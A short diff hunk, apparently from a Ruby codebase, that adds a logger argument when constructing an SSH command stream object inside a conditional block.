@@ -349,7 +349,7 @@ $user->set_var('junos-version',$imageName);
     end
 
     if ssh
-      Net::SSH::CommandStream.new(ssh)
+      Net::SSH::CommandStream.new(ssh, logger: self)
     end
   end
 
